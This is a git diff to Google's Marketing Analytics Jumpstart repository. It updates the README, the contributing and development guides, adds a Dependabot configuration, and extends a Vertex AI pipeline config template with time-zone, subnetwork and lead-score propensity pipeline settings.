diff --git a/.github/dependabot.yaml b/.github/dependabot.yaml new file mode 100644 index 00000000..446421eb --- /dev/null +++ b/.github/dependabot.yaml @@ -0,0 +1,31 @@ +# Copyright 2023 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +--- +version: 2 +updates: + - directories: + - /infrastructure/terraform + commit-message: + prefix: "chore(deps)" + package-ecosystem: "terraform" + schedule: + interval: "daily" + groups: + terraform: + applies-to: version-updates + patterns: + - hashicorp/* + - terraform-google-modules/* + - GoogleCloudPlatform/* diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index c91a8010..9ed2b7f9 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -35,40 +35,20 @@ for this purpose. ### Fork this repo. -Follow the typical Github guide on how to [fork a repo](https://docs.github.com/en/get-started/quickstart/fork-a-repo). +Follow the typical GitHub guide on how to [fork a repo](https://docs.github.com/en/get-started/quickstart/fork-a-repo). **Note**: 1. To keep track of the new releases, configure git to [sync your fork with this upstream repository](https://docs.github.com/en/get-started/quickstart/fork-a-repo#configuring-git-to-sync-your-fork-with-the-upstream-repository). -2. Don't submit a Pull Request to this upstream Github repo if you don't want to expose your environment configuration. You're at your own risk at exposing your company data. +2. Don't submit a Pull Request to this upstream GitHub repo if you don't want to expose your environment configuration. You're at your own risk at exposing your company data. 3. Observe your fork is also public, you cannot make your own fork a private repo. ### Complete the installation guide -Complete the installation guide in a Google Cloud project in which you're developer and/or owner. - -### Configure Continuous Integration recipes - -Connect your Github repository by following this [guide](https://cloud.google.com/build/docs/automating-builds/github/connect-repo-github). - -In your Google Cloud project, configure Cloud Build triggers to be executed when you push code into your branch. Update the Clould build recipes in the `cloudbuild` folder and deploy them. - -### Update GCloud and Install Beta - -```bash -gcloud components update -gcloud components install beta -``` - -### Install packages to define components, run locally and compile pipeline - -```bash -pip install poetry -poetry install -``` +Complete the manual installation guide in a Google Cloud project in which you're developer and/or owner for testing purposes. ### Modify the code and configurations as you prefer -Do all the code changes you wish. +Do all the code changes you wish/need. If you're implementing new use cases, add these resources to the existing terraform module components. Otherwise, in case you're implementing a new component, implement your own terraform module for it. @@ -80,4 +60,4 @@ Change the values in the terraform templates located in the `infrastructure/terr terraform init terraform plan terraform apply -``` \ No newline at end of file +``` diff --git a/DEVELOPMENT.md b/DEVELOPMENT.md index f85ace50..e72dee1b 100644 --- a/DEVELOPMENT.md +++ b/DEVELOPMENT.md @@ -2,8 +2,8 @@ Marketing Analytics Jumpstart consists of an easy, extensible and automated implementation of an end-to-end solution that enables Marketing Technology teams to store, transform, enrich with 1PD and analyze marketing data, and programmatically send predictive events to Google Analytics 4 to support conversion optimization and remarketing campaigns. ## Developer pre-requisites -Use Visual Studio Code to develop the solution. Install Gemini Code Assistant, Docker, Github, Hashicopr Terraform, Jinja extensions. -You should have Python 3, Poetry, Terraform, Git and Docker installed in your developer terminal environment. +Use Visual Studio Code to develop the solution. Install Gemini Code Assistant, Docker, GitHub, Hashicorp, Terraform, Jinja extensions. +You should have Python 3, uv, Terraform, Git and Docker installed in your developer terminal environment. ## Preparing development environment @@ -65,7 +65,6 @@ Here's a brief breakdown of the contents of each folder: * * `procedures/`: This folder contains the JINJA template files with the `.sqlx` extension used to generate the stored procedures deployed in BigQuery. * * `queries/`: This folder contains the JINJA template files with the `.sqlx` extension used to generate the queries deployed in BigQuery. * `templates/`: -* * `app_payload_template.jinja2`: This file defines the JINJA template used to generate the payload for the Measurement Protocol API used by the Activation Application. * * `activation_query`: This folder contains the JINJA template files with the `.sqlx` extension used to generate the SQL queries for each use case used by the Activation Application to get all the predictions to be prepared and send to Google Analytics 4. ## Out-of-the-box configuration parameters provided by the solution diff --git a/README.md b/README.md index c5c65457..1919e99f 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,22 @@ # Marketing Analytics Jumpstart -Marketing Analytics Jumpstart is a terraform automated, quick-to-deploy, customizable end-to-end marketing solution on Google Cloud Platform (GCP). This solution aims at helping customer better understand and better use their digital advertising budget. +Marketing Analytics Jumpstart (MAJ) is a terraform automated, quick-to-deploy, customizable end-to-end marketing solution on Google Cloud Platform (GCP). This solution aims at helping customer better understand and better use their digital advertising budget. -Customers are looking to drive revenue and increase media efficiency be identifying, predicting and targeting valuable users through the use of machine learning. However, marketers first have to solve the challenge of having a number of disparate data sources that prevent them from having a holistic view of customers. Marketers also often don't have the expertise and/or resources in their marketing departments to train, run, and activate ML models on paid channels. Without this solution that enables innovation through predictive analytics, marketers are missing opportunities to advance their marketing program and accelerate key goals and objectives (e.g. acquire new customers, improve customer retention, etc). +Customers in the online sales and lead generation business are looking to drive revenue and increase media efficiency be identifying, predicting and targeting valuable users through the use of machine learning. However, marketers first have to solve the challenge of having a number of disparate data sources that prevent them from having a holistic view of customers. Marketers also often don't have the expertise and/or resources in their marketing departments to train, run, and activate ML models on paid channels. Without this solution that enables innovation through predictive analytics, marketers are missing opportunities to advance their marketing program and accelerate key goals and objectives (e.g. acquire new customers, generate leads, improve customer retention, etc). +## Version Variants -## Benefits +| Version Name | Branch | Purpose | +| ------------ | ------ | ------- | +| Multi Stream Activation | [multi-stream-activation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/tree/multi-stream-activation) | Activate to multiple Google Analytics 4 data streams (websites and application). | +| Multi Property | [multi-property](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/tree/multi-property) | Deployment of multiple MAJ resources per each Google Analytics 4 property in the same Google Cloud project. | + +## Quick Installation ⏰ + +Want to quickly install and use it? Run this [installation notebook πŸ“”](https://colab.sandbox.google.com/github/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/notebooks/quick_installation.ipynb) on Google Colaboratory and leverage Marketing Analytics Jumpstart in between 30-45 minutes. + +If that was just too fast, continue reading this document to learn more in details. + +## Benefits 🫴 After installing the solution users will get: * Scheduled ETL jobs for an extensible logical data model based on the Google Analytics 4 (GA4) and Google Ads (GAds) daily exports * Validated feature engineering SQL transformations from event-level data to user-level data for reporting and machine learning models training and prediction @@ -13,40 +25,61 @@ After installing the solution users will get: * Activation application that sends models prediction to GA4 via Measurement Protocol API -## Who can benefit from this solution? -This solution is intended for Marketing Technologist teams using GA4 and GAds products. It facilitates efforts to store, transform, analyze marketing data, and programmatically creates audiences segments in Google Ads to support conversion optimization and remarketing campaigns. +## Who can benefit from this solution? πŸ™‡β€β™€οΈ +This solution is intended for Marketing Technology teams working in online sales and lead generation business using GA4 and GAds products. It facilitates efforts to store, transform, analyze marketing data, and programmatically creates audiences segments and optimize your bids in Google Ads with the goal of conversion optimization and efficiency of your ad spend. | Role | User Journeys | Skillset | Can Deploy? | |-------|-------------|----------|-------------| -| Marketing Scientist | Using an isolated and secure sandbox infrastructure to perform and monitor explorations with sensitive data. Using automated machine learning to accelerate time-to-value on building use cases solutions. Faster learning curve to quickly and easily access and analyze data from the marketing data store. Ability to collaborate with other teams by reusing similar components. | Vertex AI, Python, SQL, Data Science | No | -| Marketing Analyst | Simplifying the operation of the marketing data store (data assertions), machine learning pipelines (model training, prediction, explanation) and the activation application. Monitoring Ads Campaigns Performance, Web Traffic and Predictive Insights Reports. Interpreting the insights provided to plan and activate Ads campaigns. Defining audience segments using predictive metrics. | BigQuery, Looker Studio, Google Analytics 4, Google Ads | Yes | - | Digital Marketing Manager | Gaining insights into customer behavior to improve marketing campaigns. Identifying and targeting new customers. Measuring the effectiveness of marketing campaigns. | Looker Studio, Google Analytics 4, Google Ads | No | -| IT/Data Engineer | Building and maintaining marketing data store transformation jobs. Developing and deploying custom marketing use cases reusing a consistent infrastructure. Integrating 1st party data and Google 3rd party data by extending the marketing data store. | Python, SQL, Google Cloud Platform, Data Engineering | Yes | +| Marketing Scientist πŸ‘©β€πŸ”¬ | Using an isolated and secure sandbox infrastructure to perform and monitor explorations with sensitive data. Using automated machine learning to accelerate time-to-value on building use cases solutions. Faster learning curve to quickly and easily access and analyze data from the marketing data store. Ability to collaborate with other teams by reusing similar components. | Vertex AI, Python, SQL, Data Science | No | +| Marketing Analyst πŸ§‘β€πŸ’Ό | Simplifying the operation of the marketing data store (data assertions), machine learning pipelines (model training, prediction, explanation) and the activation application. Monitoring Ads Campaigns Performance, Web Traffic and Predictive Insights Reports. Interpreting the insights provided to plan and activate Ads campaigns. Defining audience segments using predicted values and optimizing bidding using conversion values. | BigQuery, Looker Studio, Google Analytics 4, Google Ads | Yes | + | Digital Marketing Manager πŸ€΅β€β™‚οΈ | Gaining insights into customer behavior to improve marketing campaigns. Democratizing access to digital marketing insights and strategizing campaign execution. Measuring the effectiveness of marketing campaigns. | Looker Studio, Google Analytics 4, Google Ads | No | +| IT/Data Engineer πŸ‘©β€πŸ’» | Building and maintaining marketing data store transformation jobs. Developing and deploying custom marketing use cases reusing a consistent infrastructure. Integrating 1st party data and Google 3rd party data by extending the marketing data store. | Python, SQL, Google Cloud Platform, Data Engineering | Yes | -## Use Cases -This solution enables customer to plan and take action on their marketing campaigns by interpreting the insights provided by four common predictive use cases (purchase propensity, customer lifetime value, audience segmentation and aggregated value based bidding) and an operation dashboard that monitors Campaigns, Traffic, User Behavior and Models Performance, using the best of Google Cloud Data and AI products and practices. +## Use Cases πŸ–±οΈ +This solution enables customer to plan and take action on their marketing campaigns by interpreting the insights provided by these common predictive use cases and reports that informs Campaigns performance, Traffic, User Behavior and Models Predictions insights, using the best of Google Cloud Data and AI products. These insights are used to serve as a basis to optimize paid media efforts and investments by: * Building audience segments by using all Google first party data to identify user interests and demographic characteristics relevant to the campaign -* Improving campaign performance by identifying and targeting users deciles most likely to take an action (i.e. purchase, sign-up, churn, abandon a cart, etc) +* Improving campaign performance by identifying and targeting users deciles most likely to take an action (i.e. purchase, churn, etc) * Driving a more personalized experience for your highly valued customers and improve return on ads spend (ROAS) via customer lifetime value -* Attributing bidding values to specific users according to their journeys through the conversion funnel which Ads platform uses to guide better campaign performance in specific markets - - -## Repository Structure +* Attributing bidding values to specific users according to their journeys through the conversion funnel which Ads platform uses to guide maximize conversions in specific markets + +### Ecommerce Use Cases +| Use Case | Data Sources | Model | Looker Report Name | Google Ads Campaign Optimization | +|-------|-------|-------|--------|--------| +| Purchase Propensity | Google Analytics 4 | Vertex AI Tabular Wokflows AutoML | Propensity to Purchase | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing)

Bid Adjustment (maximize conversions) [1](https://support.google.com/google-ads/answer/7068417?hl=en#zippy=%2Ctips-for-setting-up-data-segments-for-search-ads%2Csetting-bids-tailoring-ads-and-copying-campaigns) [2](https://support.google.com/google-ads/answer/2732132?sjid=8368074830549837931-NA#zippy=%2Cremarketing-lists-for-search-ads-advanced) | +| Customer Lifetime Value | Google Analytics 4 | Vertex AI Tabular Wokflows AutoML | Customer Lifetime Value | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing)

Bid Adjustment (maximize conversions) [1](https://support.google.com/google-ads/answer/7068417?hl=en#zippy=%2Ctips-for-setting-up-data-segments-for-search-ads%2Csetting-bids-tailoring-ads-and-copying-campaigns) [2](https://support.google.com/google-ads/answer/2732132?sjid=8368074830549837931-NA#zippy=%2Cremarketing-lists-for-search-ads-advanced) | +| Aggregated Value Based Bidding | Google Analytics 4 | Vertex AI Tabular Wokflows AutoML | High Value Action | [Static Conversion Values](https://support.google.com/google-ads/answer/13064107?sjid=13060303839552593837-NA#zippy=%2Cset-a-conversion-value%2Cchange-a-conversion-value) | +| Auto Audience Segmentation | Google Analytics 4 | BQML Kmeans | Interest based Audience Segmentation | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | +| Churn Propensity | Google Analytics 4 | Vertex AI Tabular Wokflows AutoML | Propensity to Churn | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | +| Audience Segmentation | Google Analytics 4 | BQML Kmeans | Demographic based Audience Segmentation | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | + + +### Lead Generation (Non-ecommerce) Use Cases +| Use Case | Data Sources | Model | Looker Report Name | Google Ads Campaign Optimization | +|-------|-------|-------|--------|--------| +| Lead Score Propensity | Google Analytics 4 | Vertex AI Tabular Wokflows AutoML | Lead Score Propensity | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing)

Bid Adjustment (maximize conversions) [1](https://support.google.com/google-ads/answer/7068417?hl=en#zippy=%2Ctips-for-setting-up-data-segments-for-search-ads%2Csetting-bids-tailoring-ads-and-copying-campaigns) [2](https://support.google.com/google-ads/answer/2732132?sjid=8368074830549837931-NA#zippy=%2Cremarketing-lists-for-search-ads-advanced) | +| Aggregated Value Based Bidding | Google Analytics 4 | Vertex AI Tabular Wokflows AutoML | High Value Action | [Static Conversion Values](https://support.google.com/google-ads/answer/13064107?sjid=13060303839552593837-NA#zippy=%2Cset-a-conversion-value%2Cchange-a-conversion-value) | +| Auto Audience Segmentation | Google Analytics 4 | BQML Kmeans | Interest based Audience Segmentation | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | +| Audience Segmentation | Google Analytics 4 | BQML Kmeans | Demographic based Audience Segmentation | [Custom Data Segments](https://support.google.com/google-ads/answer/2497941?sjid=12303667953034547771-NC#zippy=%2Cyour-data-segments-formerly-known-as-remarketing) | + +## Repository Structure πŸ—οΈ The solution's source code is written in Terraform, Python, SQL, YAML and JSON; and it is organized into five main folders: * `config/`: This folder contains the configuration file for the solution. This file define the parameters and settings used by the various components of the solution. +* `docs/`: This folder contains the detailed architecture, design principles, deployment, basic operation and troubleshooting guides for all the solution components * `infrastructure/terraform/`: This folder contains the Terraform modules, variables and the installation guide to deploy the solution's infrastructure on GCP. * `infrastructure/terraform/modules/`: This folder contains the Terraform modules and their corresponding Terraform resources. These modules corresponds to the architectural components broken down in the next section. +* `notebooks/`: Contains python notebooks to be used in Workshop sessions. * `python/`: This folder contains most of the Python code. This code implements the activation application, which sends model predictions to Google Analytics 4; and the custom Vertex AI pipelines, its components and the base component docker image used for feature engineering, training, prediction, and explanation pipelines. It also implements the cloud function that triggers the activation application, and the Google Analytics Admin SDK code that creates the custom dimensions on the GA4 property. +* `scripts/`: Miscelaneous scripts to support installation and operation of the solution. * `sql/`: This folder contains the SQL code and table schemas specified in JSON files. This code implements the stored procedures used to transform and enrich the marketing data, as well as the queries used to invoke the stored procedures and retrieve the data for analysis. * `templates/`: This folder contains the templates for generating the Google Analytics 4 Measurement Protocol API payloads used to send model predictions to Google Analytics 4. In addition to that, there is a `tasks.py` file which implements python invoke tests who hydrate values to the JINJA template files with the `.sqlx` extension located in the `sql/` folder that defines the DDL and DML statements for the BigQuery datasets, tables, procedures and queries. -## High Level Architecture +## High Level Architecture πŸ“‹ ![High Level Architecture](docs/images/reference_architecture.png) The provided architecture diagram depicts the high-level architecture of the Marketing Analytics Jumpstart solution. Let's break down the components: @@ -82,7 +115,7 @@ The provided architecture diagram depicts the high-level architecture of the Mar This high-level architecture demonstrates how Marketing Analytics Jumpstart integrates various Google Cloud services to provide a comprehensive solution for analyzing and activating your marketing data. -## Advantages +## Advantages πŸ”¦ 1. Easy to deploy: Deploy the resources and use cases that you need. 2. Cost Effective: Pay only for the cost of infrastructure in order to maintain the Data Store, Feature Store and ML Models. 3. Keep control of your data: This solution runs entirely in your environment and doesn’t transfer data out of your ownership or organization. @@ -92,30 +125,47 @@ This high-level architecture demonstrates how Marketing Analytics Jumpstart inte ## Installation Pre-Requisites - [ ] [Create GCP project](https://cloud.google.com/resource-manager/docs/creating-managing-projects#creating_a_project) and [Enable Billing](https://cloud.google.com/billing/docs/how-to/modify-project) -- [ ] Set up [Google Analyics 4 Export](https://support.google.com/analytics/answer/9823238?hl=en#zippy=%2Cin-this-article) and [Google Ads Export](https://cloud.google.com/bigquery/docs/google-ads-transfer) to Bigquery +- [ ] Set up [Google Analyics 4 Export](https://support.google.com/analytics/answer/9823238?hl=en#zippy=%2Cin-this-article) and [Google Ads Data Transfer Service](https://cloud.google.com/bigquery/docs/google-ads-transfer) to Bigquery - [ ] [Backfill](https://cloud.google.com/bigquery/docs/google-ads-transfer) BigQuery Data Transfer service for Google Ads - [ ] Have existing Google Analytics 4 Property with [Measurement ID](https://support.google.com/analytics/answer/12270356?hl=en) -**Note:** Google Ads Customer Matching currently only works with Google Analytics 4 **Properties** linked to Google Ads Accounts, it won't work for subproperties or Rollup properties. +**Note:** Google Ads Customer Matching currently only works with Google Analytics 4 **Property** and **Subproperty** linked to Google Ads Accounts, it won't work for Rollup properties. ## Installation Permissions and Privileges - [ ] Google Analytics Property Editor or Owner - [ ] Google Ads Reader -- [ ] Project Owner for GCP Project -- [ ] Github or Gitlab account priviledges for repo creation and access token. [Details](https://cloud.google.com/dataform/docs/connect-repository) +- [ ] Project Owner* for a Google Cloud Project +- [ ] GitHub or GitLab account priviledges for repo creation and access token. [Details](https://cloud.google.com/dataform/docs/connect-repository) + +**Note:** Project Owner for a Google Cloud Project is only required to speed up the deployment process. Consult this [guide]() for a more fine-grained permission list, not including the Owner role, to adhere to your company policies. + +## Compute regions and data locations compatibility + +This solution is compatible in all the regions as listed in these listings: + +| | Compute Regions | +|-------|-------| +https://cloud.google.com/compute/docs/regions-zones#available

https://cloud.google.com/vertex-ai/docs/general/locations

https://cloud.google.com/dataflow/docs/resources/locations | "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast3", "asia-south1", "asia-southeast1", "asia-southeast2", "australia-southeast1", "europe-west1", "europe-west2", "europe-west3", "europe-west4", "europe-west6", "europe-west12", "me-central1", "me-central2", "northamerica-northeast1", "southamerica-east1", "us-central1", "us-east1", "us-east4", "us-east5", "us-south1", "us-west1", "us-west2", "us-west4" | + +| | Data Locations | +|-------|-------| +https://cloud.google.com/bigquery/docs/locations | "US", "EU", "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", "asia-south1", "asia-south2", "asia-southeast1", "asia-southeast2", "australia-southeast1", "australia-southeast2", "europe-central2", "europe-north1", "europe-west1", "europe-west2", "europe-west3", "europe-west4", "europe-west6", "europe-west8", "europe-west9", "northamerica-northeast1", "northamerica-northeast2", "southamerica-east1", "southamerica-west1", "us-central1", "us-central2", "us-east1", "us-east4", "us-west1", "us-west2", "us-west3", "us-west4" | + +## Step by Step Installation πŸ‘·β€β™€οΈ -## Installation -Please follow the step by step installation guide with Google Cloud Shell. +To facilitate the step by step installation process, we offer you two routes: -[![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.svg)](https://shell.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart.git&cloudshell_git_branch=main&cloudshell_workspace=&cloudshell_tutorial=infrastructure/cloudshell/tutorial.md) +* One is a guided step by step installation with the help of Google Cloud Shell Tutorial. +* Another is to follow the step by step manual installation guide supported by a video recording. -**Note:** If you are working from a forked repository, be sure to update the `cloudshell_git_repo` parameter to the URL of your forked repository for the button link above. +To understand better which route is more appropriate for your needs, read this [documentation](./infrastructure/README.md). -The detailed installation instructions can be found at the [Installation Guide](./infrastructure/README.md). +To follow the manual installation guide, open the Youtube video below on another tab and read the instructions on the [documentation](./infrastructure/README.md) above. +[![Step by Step Installation Video](docs/images/YoutubeScreenshot.png)](https://youtu.be/JMnsIxTNbE4 "Marketing Analytics Jumpstart Installation Video") -## Contributing +## Contributing 🀝 We welcome all feedback and contributions! Please read [CONTRIBUTING.md](./CONTRIBUTING.md) for more information on how to publish your contributions. @@ -124,11 +174,13 @@ to publish your contributions. This project is licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0). -## Resources +## Resources πŸ“š This a list of public websites you can use to learn more about the Google Analytics 4, Google Ads, Google Cloud Products we used to build this solution. | Websites | Description | |----------|-------------| +| [github.com/GoogleCloudPlatform/marketing-analytics-jumpstart-dataform](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart-dataform) | Marketing Analytics Jumpstart Dataform GitHub Repository | +| [console.cloud.google.com/marketplace/product/bigquery-data-connectors/google_ads](https://console.cloud.google.com/marketplace/product/bigquery-data-connectors/google_ads) | BigQuery Data Transfer Service for Google Ads | | [support.google.com/google-ads/*](https://support.google.com/google-ads/) [support.google.com/analytics/*](https://support.google.com/analytics/) | Google Ads and Google Analytics Support | | [support.google.com/looker-studio/*](https://support.google.com/looker-studio/) | Looker Studio Support | | [developers.google.com/analytics/*](https://developers.google.com/analytics/) [developers.google.com/google-ads/*](https://developers.google.com/analytics/) | Google Ads and Google Analytics Developers Guides | diff --git a/config/config.yaml.tftpl b/config/config.yaml.tftpl index bc14353e..f798c99e 100644 --- a/config/config.yaml.tftpl +++ b/config/config.yaml.tftpl @@ -184,14 +184,18 @@ vertex_ai: schedule: # The `cron` is the cron schedule. Make sure you review the TZ=America/New_York timezone. # More information can be found at https://cloud.google.com/scheduler/docs/configuring/cron-job-schedules. - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # The `max_concurrent_run_count` defines the maximum number of concurrent pipeline runs. max_concurrent_run_count: 1 start_time: null end_time: null - # The `state` defines the state of the pipeline. - # In case you don't want to schedule the pipeline, set the state to `PAUSED`. - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-auto-audience-segmentation.execution.schedule.state} # The `pipeline_parameters` defines the parameters that are going to be used to compile the pipeline. # Those values may difer depending on the pipeline type and the pipeline steps being used. # Make sure you review the python function the defines the pipeline. @@ -262,14 +266,18 @@ vertex_ai: schedule: # The `cron` is the cron schedule. Make sure you review the TZ=America/New_York timezone. # More information can be found at https://cloud.google.com/scheduler/docs/configuring/cron-job-schedules. - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # The `max_concurrent_run_count` defines the maximum number of concurrent pipeline runs. max_concurrent_run_count: 1 start_time: null end_time: null - # The `state` defines the state of the pipeline. - # In case you don't want to schedule the pipeline, set the state to `PAUSED`. - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-audience-segmentation.execution.schedule.state} # The `pipeline_parameters` defines the parameters that are going to be used to compile the pipeline. # Those values may difer depending on the pipeline type and the pipeline steps being used. # Make sure you review the python function the defines the pipeline. @@ -320,13 +328,19 @@ vertex_ai: # `type` must be "custom", when we're building Python and/or SQL based pipelines for feature engineering purposes. type: "custom" schedule: - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # Define the maximum number of concurrent pipeline runs. # The default value is 1. max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-purchase-propensity.execution.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -375,13 +389,19 @@ vertex_ai: # `type` must be "custom", when we're building Python and/or SQL based pipelines for feature engineering purposes. type: "custom" schedule: - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # Define the maximum number of concurrent pipeline runs. # The default value is 1. max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-churn-propensity.execution.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -424,13 +444,19 @@ vertex_ai: # `type` must be "custom", when we're building Python and/or SQL based pipelines for feature engineering purposes. type: "custom" schedule: - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # Define the maximum number of concurrent pipeline runs. # The default value is 1. max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-customer-ltv.execution.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -479,13 +505,19 @@ vertex_ai: type: "custom" schedule: # The cron string is - cron: "TZ=America/New_York 0 1 * * *" + cron: "TZ=${time_zone} 0 1 * * *" # Define the maximum concurrent run count of the pipeline. # The default value is 1. max_concurrent_run_count: 1 start_time: null end_time: null - state: PAUSED # possible states ACTIVE or PAUSED + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-aggregated-value-based-bidding.execution.schedule.state} pipeline_parameters: project_id: "${project_id}" location: "${location}" @@ -499,6 +531,67 @@ vertex_ai: pipeline_parameters_substitutions: aggregated_value_based_bidding_training_preparation_procedure_name: "${project_id}.aggregated_vbb.invoke_aggregated_value_based_bidding_training_preparation" aggregated_value_based_bidding_explanation_preparation_procedure_name: "${project_id}.aggregated_vbb.invoke_aggregated_value_based_bidding_explanation_preparation" + + # This pipeline contains the configuration parameters for the feature creation pipeline for the lead score propensity model. + # To deploy this pipeline to your Google Cloud project: + ## 1. Define the pipeline parameters below, following YAML format + ## 2. Define the queries and procedures SQL parameters in this file under the `bigquery` section, following YAML format + ## 3. Create the queries and procedures SQL files under sql/ folder + ## 4. Create the terraform resources uin terraform/feature-store/bigquery-procedures.tf + ## 5. Create the terraform resources to compile and schedule the pipeline in terraform/pipelines/pipelines.tf + ## 6. Define python function that perform `compilation` and `upload to GCS bucket` are defined in `python/pipelines/compiler.py` and `python/pipelines/uploader.py`. + ## 7. Define python function that perform `schedule` of the pipeline is defined in `python/pipelines/scheduler.py`. + ## 8. Create the pipeline python function in python/pipelines/feature_engineering_pipelines.py + ## 9. Run terraform apply + feature-creation-lead-score-propensity: + execution: + name: "feature-creation-lead-score-propensity" + job_id_prefix: "feature-creation-lead-score-propensity-" + experiment_name: "feature-creation-lead-score-propensity" + # `type` must be "custom", when we're building Python and/or SQL based pipelines for feature engineering purposes. + type: "custom" + schedule: + cron: "TZ=${time_zone} 0 1 * * *" + # Define the maximum number of concurrent pipeline runs. + # The default value is 1. + max_concurrent_run_count: 1 + start_time: null + end_time: null + # The `subnetwork` defines the subnetwork in which the pipeline will be executed. + # The default value is "default". + # Follow the guide: https://cloud.google.com/vertex-ai/docs/general/vpc-peering + subnetwork: "default" + # If you want to use the vpc network defined above, set the following flag to true + use_private_service_access: false + state: ${pipeline_configuration.feature-creation-lead-score-propensity.execution.schedule.state} + pipeline_parameters: + project_id: "${project_id}" + location: "${location}" + # The query_lead_score_propensity_label defines the procedure that will be used to invoke the creation of the lead score propensity label feature table. + query_lead_score_propensity_label: " + CALL `{lead_score_propensity_label_procedure_name}`();" + # The query_user_dimensions defines the procedure that will be used to invoke the creation of the user dimensions feature table. + query_user_dimensions: " + CALL `{user_dimensions_procedure_name}`();" + # The query_user_rolling_window_metrics defines the procedure that will be used to invoke the creation of the user rolling window metrics feature table. + query_user_rolling_window_metrics: " + CALL `{user_rolling_window_metrics_procedure_name}`();" + # The query_lead_score_propensity_inference_preparation define the procedure that will be used to invoke the creation of the lead score propensity inference preparation table. + query_lead_score_propensity_inference_preparation: " + CALL `{lead_score_propensity_inference_preparation_procedure_name}`();" + # The query_lead_score_propensity_training_preparation define the procedure that will be used to invoke the creation of the lead score propensity training preparation table. + query_lead_score_propensity_training_preparation: " + CALL `{lead_score_propensity_training_preparation_procedure_name}`();" + timeout: 3600.0 + pipeline_parameters_substitutions: # Substitutions are applied to the parameters before compilation + lead_score_propensity_label_procedure_name: "${project_id}.feature_store.invoke_lead_score_propensity_label" + user_dimensions_procedure_name: "${project_id}.feature_store.invoke_user_dimensions" + user_rolling_window_metrics_procedure_name: "${project_id}.feature_store.invoke_user_rolling_window_lead_metrics" + user_scoped_metrics_procedure_name: "${project_id}.feature_store.invoke_user_scoped_metrics" + 